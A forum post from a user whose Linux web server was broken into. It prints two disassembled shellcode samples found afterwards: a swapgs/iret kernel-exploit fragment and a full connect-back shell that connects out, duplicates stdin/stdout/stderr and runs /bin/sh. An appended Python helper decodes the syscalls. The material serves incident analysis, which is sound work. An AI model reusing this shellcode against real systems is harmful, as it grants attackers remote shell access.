Seeking help from assembly and security gurus. My Linux box was hacked!

Discussion in 'all things UNIX' started by jumalinuxguy, Nov 4, 2013.

Thread Status:
Not open for further replies.
    jumalinuxguy (Registered Member, joined Nov 4, 2013, posts: 1)
    Hello friends,

    I run a personal web server that recently suffered an unfortunate break-in / hacking attempt. The server that was broken into is running CentOS 6.3 (old, yes, I know).

    I have already taken the server offline to limit further damage and penetration to my home network.

    Recently, while attempting to do a post-mortem analysis of the attacks which were used, I found some shellcode.

    Please forgive me, I am ignorant of most technical code (also my English is still very bad). My work friend helped me to decrypt these shellcodes. He says they are assembly, but I know very little about assembly language programming, so I come here to ask you if these programs look bad to you?

    Can some assembly guru here please tell me what these codes were used to do to my web server? I am pretty sure they broke into the root account. And I have unplugged this machine, so no more damage can be done.

    But still I would like to know HOW they did it, and what the assembly programs exploited, so that I can better protect my server in the future.

    Thank you all much!!

    Assembly codes below.

    program 1:
    ------SNIP--------
    .data:0x00000000 0f01f8 swapgs
    .data:0x00000003 e805000000 call func_0000000d
    .data:0x00000008 0f01f8 swapgs
    .data:0x0000000b 48 dec eax
    .data:0x0000000c cf iret
    ------SNIP--------


    program 2:
    ------SNIP--------
    .data:0x00000000 31c0 xor eax,eax
    .data:0x00000002 31db xor ebx,ebx
    .data:0x00000004 31c9 xor ecx,ecx
    .data:0x00000006 31d2 xor edx,edx
    .data:0x00000008 b066 mov al,0x66
    .data:0x0000000a b301 mov bl,0x1
    .data:0x0000000c 51 push ecx
    .data:0x0000000d 6a06 push 0x6
    .data:0x0000000f 6a01 push 0x1
    .data:0x00000011 6a02 push 0x2
    .data:0x00000013 89e1 mov ecx,esp
    .data:0x00000015 cd80 int 0x80
    .data:0x00000017 89c6 mov esi,eax
    .data:0x00000019 b066 mov al,0x66
    .data:0x0000001b 31db xor ebx,ebx
    .data:0x0000001d b302 mov bl,0x2
    .data:0x0000001f 6866686653 push 0x53666866
    .data:0x00000024 fec3 inc bl
    .data:0x00000026 89e1 mov ecx,esp
    .data:0x00000028 6a10 push 0x10
    .data:0x0000002a 51 push ecx
    .data:0x0000002b 56 push esi
    .data:0x0000002c 89e1 mov ecx,esp
    .data:0x0000002e cd80 int 0x80
    .data:0x00000030 31c9 xor ecx,ecx
    .data:0x00000032 b103 mov cl,0x3
    .data:0x00000034 loc_00000034:
    ┏▶ .data:0x00000034 fec9 dec cl
    ┃ .data:0x00000036 b03f mov al,0x3f
    ┃ .data:0x00000038 cd80 int 0x80
    ┗ .data:0x0000003a 75f8 jne loc_00000034
    .data:0x0000003c 31c0 xor eax,eax
    .data:0x0000003e 52 push edx
    .data:0x0000003f 686e2f7368 push 0x68732f6e
    .data:0x00000044 682f2f6269 push 0x69622f2f
    .data:0x00000049 89e3 mov ebx,esp
    .data:0x0000004b 52 push edx
    .data:0x0000004c 53 push ebx
    .data:0x0000004d 89e1 mov ecx,esp
    .data:0x0000004f 52 push edx
    .data:0x00000050 89e2 mov edx,esp
    .data:0x00000052 b00b mov al,0xb
    .data:0x00000054 cd80 int 0x80
    ------SNIP--------


    Thank you all and well wishes!
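To triage what a listing like program 2 actually asks the kernel for, here is an added Python helper (my own, not the poster's or any tool's output): it walks the disassembly in the format shown above, tracks the low bytes of eax/ebx, maps each int 0x80 to its i386 Linux syscall number (and socketcall sub-function), and reassembles the ASCII that consecutive push immediates leave on the stack. The embedded listing is an excerpt of program 2; the syscall tables are the standard i386 numbers, and the register model assumes, as this code does, that eax/ebx are zeroed before al/bl are written.

```python
import re
# i386 Linux syscall numbers (eax at int 0x80) and socketcall subcalls (ebx)
SYSCALLS = {0x66: "socketcall", 0x3f: "dup2", 0x0b: "execve"}
SOCKETCALL = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}
LINE = re.compile(r"\.data:0x[0-9a-f]+[ \t]+[0-9a-f]+[ \t]+(\w+)(?:[ \t]+(\S+))?")

# Excerpt of "program 2" from the post, in the disassembler's own listing format
EXCERPT = """
.data:0x00000008 b066 mov al,0x66
.data:0x0000000a b301 mov bl,0x1
.data:0x00000015 cd80 int 0x80
.data:0x0000001d b302 mov bl,0x2
.data:0x0000001f 6866686653 push 0x53666866
.data:0x00000024 fec3 inc bl
.data:0x0000002e cd80 int 0x80
.data:0x0000003f 686e2f7368 push 0x68732f6e
.data:0x00000044 682f2f6269 push 0x69622f2f
.data:0x00000052 b00b mov al,0xb
.data:0x00000054 cd80 int 0x80
"""

def imm_ascii(value):
    # The 4 little-endian bytes a push imm32 writes, as text, or None if not printable
    raw = value.to_bytes(4, "little")
    return raw.decode() if all(0x20 <= b < 0x7f for b in raw) else None

def analyze(listing):
    regs, run, events = {"eax": 0, "ebx": 0}, [], []   # only al/bl are written here
    for m in LINE.finditer(listing):
        mnem, ops = m.group(1), m.group(2) or ""
        text = imm_ascii(int(ops, 16)) if mnem == "push" and ops.startswith("0x") else None
        if text:                      # collect consecutive printable pushes
            run.append(text)
            continue
        if run:                       # stack grows down: bytes read in reverse push order
            events.append("stack bytes: " + "".join(reversed(run)))
            run = []
        if mnem == "xor" and ops in ("eax,eax", "ebx,ebx"):
            regs[ops[:3]] = 0
        elif mnem == "mov" and ops[:3] in ("al,", "bl,"):
            regs["e" + ops[0] + "x"] = int(ops[3:], 16)
        elif mnem == "inc" and ops == "bl":
            regs["ebx"] += 1
        elif mnem == "int" and ops == "0x80":
            name = SYSCALLS.get(regs["eax"], f"syscall {regs['eax']}")
            if regs["eax"] == 0x66:
                name += "/" + SOCKETCALL.get(regs["ebx"], str(regs["ebx"]))
            events.append(f"int 0x80: {name}")
    return events
```

Running analyze(EXCERPT) reports socket, then connect, then execve with "//bin/sh" on the stack, which is the sequence of a connect-back shell; the full listing additionally loops dup2 three times over fds 0-2 before the execve.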
     